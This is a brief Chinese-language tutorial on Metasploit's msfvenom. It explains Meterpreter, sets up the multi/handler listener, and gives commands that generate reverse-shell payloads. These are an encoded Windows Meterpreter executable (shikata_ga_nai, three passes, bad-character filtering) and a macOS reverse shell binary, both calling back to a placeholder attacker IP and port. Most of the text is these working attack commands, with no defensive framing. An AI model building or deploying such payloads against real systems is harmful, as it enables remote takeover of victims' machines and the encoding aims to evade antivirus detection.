msfvenom是把Metasploit的有效载荷嵌入到正规可执行文件中的利器。其中多数生成的payload以Meterpreter模块巨多。Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。 可操作参数如下
msfvenom的接收句柄
一般采用msf中的exploit/multi/handler模块接收MSFVENOM后渗透返回的控制通道。具体的payload见下。 use exploit/multi/handler-》set payload windows/meterpreter/reverse_tcp-》show options->set -》exploit
MSFVENOM的生成实例
windows:
`msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe`
mac:
`msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho`